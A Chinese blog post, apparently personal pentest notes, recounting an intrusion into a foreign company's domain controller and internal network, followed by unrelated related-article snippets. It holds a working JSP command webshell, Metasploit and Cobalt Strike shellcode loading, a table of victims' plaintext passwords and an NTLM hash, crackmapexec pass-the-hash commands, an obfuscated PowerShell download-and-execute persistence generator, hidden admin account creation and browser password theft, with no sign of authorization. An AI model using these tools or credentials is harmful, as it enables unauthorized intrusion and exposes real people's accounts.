記對外國某服務器的內網滲透

本專欄是筆者的網絡安全學習筆記,一面分享,同時作為筆記

文章目錄

    • 前文鏈接
    • 前言
    • 上線CS
    • 上線rdp
    • 后滲透
      • 信息收集
      • SMB Pth攻擊
      • 權限維持
      • 魔幻上線提權
      • 關Windows Defender
    • end

前文鏈接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目錄掃描,請求重發,漏洞掃描等工具的使用
  4. 網站信息收集及nmap的下載使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各種注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——實戰SQL注入拿webshell
  9. Vulnhub靶機滲透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上傳漏洞
  12. 文件上傳繞過
  13. 文件包含漏洞
  14. Vulnhub靶機滲透之zico2
  15. 命令執行漏洞
  16. 邏輯漏洞(越權訪問和支付漏洞)
  17. 網站后臺安全
  18. weevely的使用及免殺(Linux中的菜刀)
  19. MSF(1)——一次完整的滲透流程
  20. WebShell命令執行限制(解決方案)
  21. 記一次艱難的SQL注入(過安全狗)
  22. MSF(2)——各種木馬的生成及簡單的免殺
  23. MSF(3)——apk和exe的加馬(過360、火絨)
  24. 通過Frp解決實現內網穿透
  25. 改造冰蝎馬,實現免殺之default_aes php
  26. 使用FofaSpider和Python聯動批量挖洞
  27. 記一次簡單的對盜號網站的滲透
  28. 記一次幸運的漏洞挖掘
  29. 記一次從外網打通AWS云
  30. 內網滲透初探

前言

外網打點是怎么拿的就不說了,跟前兩篇博客一樣。總之得到了一個jsp的webshell,嘗試執行cmdline失敗。
在這里插入圖片描述
這種一般就是工具的問題,換個工具或者重新穿個cmd的webshell就行,這里我放一個AI寫的,能用。

<%@ page import="java.util.*,java.io.*" %>
<HTML>
<BODY>
<FORM METHOD="POST" NAME="cmd">
<INPUT TYPE="text" NAME="command" SIZE="60">
<INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("command") != null) {Process p = null;StringBuilder output = new StringBuilder();try {// 執行Windows命令p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("command"));// 讀取命令輸出BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while ((line = reader.readLine()) != null) {output.append(line).append("\n");}// 讀取錯誤流BufferedReader errReader = new BufferedReader(new InputStreamReader(p.getErrorStream()));while ((line = errReader.readLine()) != null) {output.append(line).append("\n");}p.waitFor();} catch (Exception e) {output.append("ERROR: ").append(e.getMessage());} finally {if (p != null) p.destroy();}out.print(output.toString()); // 回顯結果
}
%>
</PRE>
</BODY>
</HTML>

system權限。
在這里插入圖片描述
看看進程

tasklsit /svc

在這里插入圖片描述
有Windows Defender,這下麻煩了。。

上線CS

因為我想內網滲透,所以直接嘗試上線。
用CS自帶的web投遞功能試試。
在這里插入圖片描述
在這里插入圖片描述
什么玩意,翻譯看看
在這里插入圖片描述
直接被攔。但是問題不大。我還有一招。

用哥斯拉自帶的shellcode加載功能,上線msf。
在這里插入圖片描述
msf拿到監聽后,background藏一下。
在這里插入圖片描述
用cs的PAYLOAD生成器生成一個raw的shellcode,保存為.bin文件,放進kali
在這里插入圖片描述
使用post/windows/manage/shellcode_inject模塊內存加載shellcode
在這里插入圖片描述
這里SESSION就寫剛才得到的SESSION就行,SHELLCODE寫絕對路徑。

run之后cs成功上線。
在這里插入圖片描述

上線rdp

看看有沒有開rdp

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

在這里插入圖片描述
0x0就是開了

看看端口是多少

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

在這里插入圖片描述
d3d就是3389.

抓個密碼
在這里插入圖片描述
東西太多了,讓ai總結。

用戶名域/主機明文密碼來源
soporteisBUHOIYSRayzen5-3310SSP
FedericoBUHOIYSLuTi-072021*tspkg
afloresBUHOIYS30deNoviembre6tspkg
aleBUHOIYSSanMiguel21tspkg
nparedesBUHOIYSkaty-2020tspkg
sqlmanagerBUHOIYSFuture2050tspkg
carlosBUHOIYSTininin2090tspkg

隨意選一個幸運用戶上線。
在這里插入圖片描述
登陸成功

后滲透

信息收集

先信息收集,執行幾個指令,丟給ai去總結

systeminfo
whoami /all
ipconfig /all
分類關鍵信息說明 / 對滲透的意義
主機信息主機名:SIYS4域控服務器(Primary Domain Controller),高價值目標
OS:Windows Server 2022 Standard (10.0.20348)最新系統,部分舊漏洞無效,但依然可利用配置錯誤
廠商:Lenovo ThinkSystem SR650 V3物理服務器,性能強,可能掛載多虛擬機
BIOS:Lenovo ESE124C-3.12 (2024-02-22)硬件相對新
安裝時間:2025-03-26較新系統,賬戶/策略可能近期配置
時區:UTC-3(布宜諾斯艾利斯)阿根廷時區,方便社工判斷上下班時間
域信息域:buhoiys.local域內 lateral movement 可用
系統角色:Primary Domain Controller持有全部域用戶哈希,可進行 DCSync 攻擊
網絡信息物理網卡1:192.168.250.15/24 GW:192.168.250.1內網主地址,直連內部網絡
Hyper-V 虛擬網卡:192.168.250.16/24可能通向虛擬機網絡
Radmin VPN:26.229.91.5/8 GW:26.0.0.1跨網段訪問,可能連到外部管理網絡
Hamachi VPN:25.28.204.74/8 GW:25.0.0.1類似,可能有其他被控節點
DNS:192.168.250.15(自指)本機是域 DNS 服務器,可做 DNS zone transfer
權限信息當前用戶:NT AUTHORITY\SYSTEM本地 SYSTEM 權限,可直接讀寫 LSASS,導出SAM/NTDS
SeImpersonatePrivilege:啟用可進行 Juicy Potato / PrintSpoofer / RoguePotato 提權或橫向
SeDebugPrivilege:啟用可直接注入進程、調試 SYSTEM 級程序
域控管理員組成員已處于域最高權限層級

域控,很刺激啊。

SMB Pth攻擊

用hashdump導出Administrator的hash

Administrador/cf4658454e9373ecf160dc903022f954

然后走一個suo5的代理,用msf掛上proxychain批量掃C段

proxychains crackmapexec smb 192.168.250.0/24 -u Administrador -H cf4658454e9373ecf160dc903022f954 --exec-method smbexec > smb.txt
cat smb.txt | grep [+]

在這里插入圖片描述
這么多Pwn3d,起飛了家人們

直接執行指令whoami。

proxychains crackmapexec smb 192.168.250.5 -u Administrador -H cf4658454e9373ecf160dc903022f954 -x "whoami" --exec-method smbexec

在這里插入圖片描述
system權限。

我們直接用web投遞的一句話上線CS:
在這里插入圖片描述
在這里插入圖片描述
排除重復主機,拿下兩臺主機
在這里插入圖片描述

權限維持

目前比較懶,只有兩種方式,一是用WEB投遞生成URL,然后用powershell拉取執行,另一種是本地文件執行。都是寫注冊表,用下面這個html快速生成。

<!DOCTYPE html> 
<html lang="en">
<head><meta charset="UTF-8"><title>權限維持小妙招</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body {font-family: Arial, sans-serif;background: #121212;color: #f0f0f0;padding: 20px;}h1 {text-align: center;color: #fff;}form {max-width: 500px;margin: 0 auto;background: #1e1e1e;padding: 20px;border-radius: 10px;box-shadow: 0 4px 8px rgba(0,0,0,0.5);}label {display: block;font-weight: bold;margin-bottom: 8px;color: #ddd;}input[type="text"] {width: 100%;padding: 8px 10px;margin-bottom: 15px;border: 1px solid #444;background: #2b2b2b;color: #fff;border-radius: 6px;outline: none;transition: border-color 0.3s;}input[type="text"]:focus {border-color: #00bfff;}input[type="submit"] {background: #00bfff;color: white;padding: 10px 18px;border: none;border-radius: 6px;cursor: pointer;width: 100%;transition: background 0.3s;}input[type="submit"]:hover {background: #008fcc;}.result-box {max-width: 500px;margin: 20px auto;background: #1e1e1e;padding: 15px;border-radius: 8px;box-shadow: 0 4px 6px rgba(0,0,0,0.5);}.result-line {margin-bottom: 15px;}.result-label {font-weight: bold;color: #00bfff;margin-bottom: 5px;display: block;}.result-line span {display: block;word-break: break-all;background: #2b2b2b;padding: 8px;border-radius: 6px;margin-bottom: 5px;font-size: 0.9em;}.copy-btn {background: #28a745;color: white;border: none;padding: 6px 12px;border-radius: 6px;cursor: pointer;font-size: 0.85em;transition: background 0.3s;}.copy-btn:hover {background: #1e7e34;}@media (max-width: 600px) {body {padding: 10px;}.result-box, form {padding: 15px;}input[type="submit"] {font-size: 1em;}}</style>
</head>
<body>
<h1>權限維持小妙招</h1>
<form id="form"><label for="command">請輸入 URL 或 文件絕對路徑:</label><input type="text" id="command" placeholder="例如:http://example.com 或 C:\path\file.exe" required><input type="submit" value="生成">
</form><div class="result-box" id="results" style="display:none;"><div class="result-line"><span class="result-label">用戶權限版(USER)</span><span id="res1"></span><button class="copy-btn" data-target="res1">復制</button></div><div class="result-line"><span class="result-label">SYSTEM權限版(SYSTEM)</span><span id="res2"></span><button class="copy-btn" data-target="res2">復制</button></div><div class="result-line" id="rawCmdBlock" style="display:none;"><span class="result-label">原始指令(未經Base64編碼)</span><span id="rawUser"></span><button class="copy-btn" data-target="rawUser">復制用戶權限版</button><br><span id="rawSystem" style="margin-top:10px;display:block;"></span><button class="copy-btn" data-target="rawSystem">復制SYSTEM權限版</button></div>
</div><script>function toBase64Utf16LE(str) {const buf = new Uint16Array(str.length);for (let i = 0; i < str.length; i++) {buf[i] = str.charCodeAt(i);}const bytes = new Uint8Array(buf.buffer);let binary = '';for (let i = 0; i < bytes.byteLength; i++) {binary += String.fromCharCode(bytes[i]);}return btoa(binary);}document.getElementById("form").addEventListener("submit", function (e) {e.preventDefault();const command = document.getElementById("command").value.trim();const res1 = document.getElementById("res1");const res2 = document.getElementById("res2");const rawCmdBlock = document.getElementById("rawCmdBlock");const rawUser = document.getElementById("rawUser");const rawSystem = document.getElementById("rawSystem");let USER, SYSTEM;rawUser.textContent = "";rawSystem.textContent = "";rawCmdBlock.style.display = "none";if (command.toLowerCase().startsWith("http")) {// 網絡 URLlet payload = `$u='${command}';$s='Ne'+'w-Object';$t='Net.W'+'ebClient';$d='Download'+'String';IEX((&($s) $t).$d($u))`;let encoded = toBase64Utf16LE(payload);if (!encoded) {alert("Base64 編碼失敗,請檢查輸入!");return;}USER = `reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "powershell.exe -nop -w hidden -enc ${encoded}" /f`;SYSTEM = `reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "powershell.exe -nop -w hidden -enc ${encoded}" /f`;// 原始命令const rawUserCmd = `reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "powershell.exe -nop -w hidden -c \\"IEX (New-Object Net.WebClient).DownloadString('${command}')\\"" /f`;const rawSystemCmd = `reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "powershell.exe -nop -w hidden -c \\"IEX (New-Object Net.WebClient).DownloadString('${command}')\\"" /f`;rawUser.textContent = rawUserCmd;rawSystem.textContent = rawSystemCmd;rawCmdBlock.style.display = "block";} else {// 文件路徑USER = `reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "${command}" /f`;SYSTEM = `reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateAgent /t REG_SZ /d "${command}" /f`;rawCmdBlock.style.display = "none";}res1.textContent = USER;res2.textContent = SYSTEM;document.getElementById("results").style.display = "block";});document.querySelectorAll(".copy-btn").forEach(btn => {btn.addEventListener("click", function () {let targetId = this.getAttribute("data-target");let text = document.getElementById(targetId).textContent;navigator.clipboard.writeText(text).then(() => {const originalText = this.textContent;this.textContent = "已復制";setTimeout(() => this.textContent = originalText, 1500);});});});
</script>
</body>
</html>

在這里插入圖片描述
輕松愉快

魔幻上線提權

我本來想用3389的連接上傳microsocks跑穩定的socks5服務端的,但是文件傳上去,用cs去spawn卻總是找不到文件路徑。好奇心驅使下我就執行了systeminfo。
在這里插入圖片描述
250.1,SIYSV,給我干哪來了?我最開始連的不是250.15嗎?我打的不是SIYS1-4嗎?

不管了,上線CS。
在這里插入圖片描述
嘗試提權,看看補丁
在這里插入圖片描述
119個?!
在這里插入圖片描述
其實能用的exp還挺多的。

打一個msf方便操作。
在這里插入圖片描述
然后background去找exp
。。。。。
我把所有的exp全都打了一遍,沒有一個成功的。那么我是怎么提權的呢。。

其實我現在登錄的用戶就已經是管理員組了,所以我們可以傳cs的exe馬上去,然后右鍵,以管理員運行,然后直接getsystem就好了。
在這里插入圖片描述
在這里插入圖片描述
魔幻詭異的服務器。

關Windows Defender

煩死了,wd繞不掉,權限維持不了。直接上3389關掉算了

直接新建一個影子用戶,掛上代理上線rdp。

shell net user tt$ Tt@123456 /add
shell net localgroup administrators tt$ /add
shell net localgroup  "Remote Desktop Users" tt$ /add

上線
在這里插入圖片描述
上線后在用戶列表里找一個已登錄用戶,用之前抓到的密碼重新登錄,再刪除影子用戶。
在這里插入圖片描述
在這里插入圖片描述
不對。
在這里插入圖片描述
給我干哪來了?
在這里插入圖片描述
成功上線

研究了一下,原來是我登錄的這個用戶開了個rdp的全屏沒關。白送我一臺服務器。

讀取瀏覽器密碼

在這里插入圖片描述

哥們,這啥啊?login.microsoftonline.com是什么??dropbox.com是什么??這么勁爆嗎!

抓個密碼:

Federico/McElite0302

end

就這樣吧,打不動了

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/918876.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/918876.shtml
英文地址,請注明出處:http://en.pswp.cn/news/918876.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

速賣通平臺關鍵字搜索商品列表列表接口實現指南:從接口分析到代碼落地

在跨境電商開發中&#xff0c;速賣通平臺的商品數據獲取是許多開發者關注的焦點。本文將詳細介紹如何實現速賣通關鍵字搜索商品列表接口&#xff0c;涵蓋接口請求參數分析、簽名機制、分頁處理及完整代碼實現&#xff0c;幫助開發者快速對接速賣通開放平臺。一、接口基本信息速…

UE UDP通信

1.確保工程為C工程&#xff0c;在項目工程的xx.Build.cs中加入Networking和Sockets模塊。PublicDependencyModuleNames.AddRange(new string[] { "Core", "CoreUObject", "Engine", "InputCore", "Networking", "Socke…

JavaScript 邏輯運算符與實戰案例:從原理到落地

JavaScript 中的邏輯運算符不僅是條件判斷的核心&#xff0c;還能通過“短路特性”簡化代碼&#xff1b;結合 DOM 操作的實戰案例&#xff0c;更能體現其靈活性。本文整理了邏輯運算符的個人理解、優先級規則&#xff0c;以及 4 個高頻實戰需求的實現方案&#xff0c;附個人思路…

Android RxJava 過濾與條件操作詳解

RxJava 是一個基于觀察者模式的響應式編程庫&#xff0c;在 Android 開發中被廣泛使用。其中&#xff0c;過濾和條件操作是 RxJava 中非常重要的一部分&#xff0c;它們允許我們對數據流進行精細控制。本文將詳細介紹 RxJava 中常用的過濾與條件操作符及其使用場景。一、過濾操…

云手機都具有哪些特點?

云手機擁有著便捷的遠程操作功能&#xff0c;讓用戶無論身處何地&#xff0c;只要能連接網絡&#xff0c;就能通過手機、電腦等終端設備遠程操控云手機&#xff0c;無需受限于物理位置&#xff0c;大大提升了工作的靈活性與便捷性。云手機主要是依賴于云計算技術&#xff0c;能…

Sparse-ICP—(4) 加權稀疏迭代最近點算法(matlab版)

目錄 一、算法原理 1、原理概述 2、參考文獻 二、代碼實現 三、結果展示 一、算法原理 1、原理概述 見:Sparse-ICP—(1)稀疏迭代最近點算法 2、參考文獻 二、代碼實現 SparseWeightedDistance.m function [move_points,T] =

統信UOS安裝NFS共享文件夾

在 UOS ARM 架構系統上安裝和配置 NFS 服務&#xff0c;實現與局域網中其他服務器共享文件夾的步驟如下&#xff1a;1. 安裝 NFS 服務首先更新系統并安裝 NFS 服務器組件&#xff1a;bash# 更新軟件包列表 sudo apt update# 安裝NFS服務器 sudo apt install nfs-kernel-server …

【完整源碼+數據集+部署教程】孔洞檢測系統源碼和數據集:改進yolo11-RetBlock

背景意義 研究背景與意義 隨著工業自動化和智能制造的快速發展&#xff0c;孔洞檢測作為關鍵的質量控制環節&#xff0c;受到了廣泛關注。孔洞的存在可能會影響產品的強度、密封性和整體性能&#xff0c;因此&#xff0c;準確、快速地檢測孔洞對于保障產品質量至關重要。傳統的…

k8s環境使用Operator部署Seaweedfs集群(一)

#作者&#xff1a;閆乾苓 文章目錄4.1 前置條件4.2 部署seaweedfs-operator4.3 準備operator鏡像SeaweedFS Operator是一個Kubernetes Operator&#xff0c;用于自動化部署和管理SeaweedFS集群 README.md:6-8 。部署分為兩個階段&#xff1a;首先部署Operator本身&#xff0c;然…

實踐基地落地:成都影像產業園與重慶五一職院強實訓

近日&#xff0c;成都國際影像產業園與重慶五一職業技術學院合作的實踐基地正式落地&#xff0c;這一舉措為雙方強化實訓合作、培養高素質技能人才注入了新的活力。實踐基地的落地&#xff0c;是雙方基于各自優勢資源的深度融合。成都國際影像產業園作為影像行業的重要聚集地&a…

算法----滑動窗口

滑動窗口 什么是滑動窗口 滑動窗口是一種常用的技術&#xff0c;主要用于處理連續數據序列&#xff08;如數組、字符串或時間序列數據&#xff09;&#xff0c;通過動態調整一個固定大小的“窗口”來高效地解決問題。窗口在序列上“滑動”&#xff0c;每次移動一個位置&#xf…

Rust學習筆記(三)|所有權機制 Ownership

本篇文章包含的內容1 重新從堆和棧開始考慮2 所有權規則3 變量和數據&#xff08;值&#xff09;的交互方式3.1 移動 Move3.2 克隆 Clone3.3 復制 Copy4 函數與所有權4.1 參數傳遞時的所有權轉移4.2 函數返回時的所有權轉移5 引用和借用6 切片前面兩篇僅僅介紹了一些Rust的語法…

Redis 知識點與應用場景

1. Redis 簡介與核心特性Redis&#xff08;Remote Dictionary Server&#xff09;是一款開源的內存數據存儲系統&#xff0c;支持多種數據結構&#xff0c;兼具高性能、持久化、分布式等特性&#xff0c;廣泛用于緩存、數據庫、消息中間件等場景。其核心特性包括&#xff1a;高…

日常反思總結

1.group by和order by的區別

易貝 (eBay (eBay) 關鍵字搜索 API 實戰:從認證到商品列表獲取全流程解析

在跨境電商開發領域&#xff0c;eBay 作為全球最大的在線交易平臺之一&#xff0c;其開放 API 為開發者提供了豐富的商品數據獲取能力。本文將聚焦 eBay 關鍵字搜索商品列表接口的實現&#xff0c;涵蓋 OAuth2.0 認證、高級搜索參數配置、分頁策略及完整代碼實現&#xff0c;幫…

敏捷數據開發實踐:基于 Amazon Q Developer + Remote MCP 構建本地與云端 Amazon Redshift 交互體系

敏捷數據開發實踐&#xff1a;基于 Amazon Q Developer Remote MCP 構建本地與云端 Amazon Redshift 交互體系 新用戶可獲得高達 200 美元的服務抵扣金 亞馬遜云科技新用戶可以免費使用亞馬遜云科技免費套餐&#xff08;Amazon Free Tier&#xff09;。注冊即可獲得 100 美元的…

【SpringBoot】11 概念理解 - 深入理解 Java 和 Spring 中的容器、組件、類、對象與 Bean

文章目錄引言1. 基本概念解析1.1 類&#xff08;Class&#xff09;1.2 對象&#xff08;Object&#xff09;1.3 組件&#xff08;Component&#xff09;1.4 Bean 實例&#xff08;Bean Instance&#xff09;1.5 容器&#xff08;Container&#xff09;2. 運行時 vs. 非運行時的…

【學習嵌入式day-25-線程】

exec函數族exec函數族利用進程空間執行另一份代碼#include "../head.h"int main(void) {char *parg[5] {"./hello","how","are","you",NULL,};printf("execl-up\n");//execl("./hello", "./hello…

Rust 中 Box 的深度解析:作用、原理與最佳實踐

Rust 中 Box 的深度解析&#xff1a;作用、原理與最佳實踐 Box 是 Rust 中最基礎且最重要的智能指針類型&#xff0c;它在 Rust 的內存管理和所有權系統中扮演著核心角色。以下是關于 Box 的全面解析&#xff1a; Box 的核心作用 #mermaid-svg-m6liFZlmqOHRfIZB {font-family:&…

【測試用例】

需求背景部分金融/政企等行業客戶&#xff0c;企業內部安全要求較高&#xff0c;且因為某些原因未接入 sso 登錄&#xff0c;會要求 MG 提供較為復雜的密碼規則甚至提供強更機制&#xff1b;且每個客戶的安全要求不一樣目前 MG 線上密碼規則&#xff1a; 8 位以上&#xff0c;包…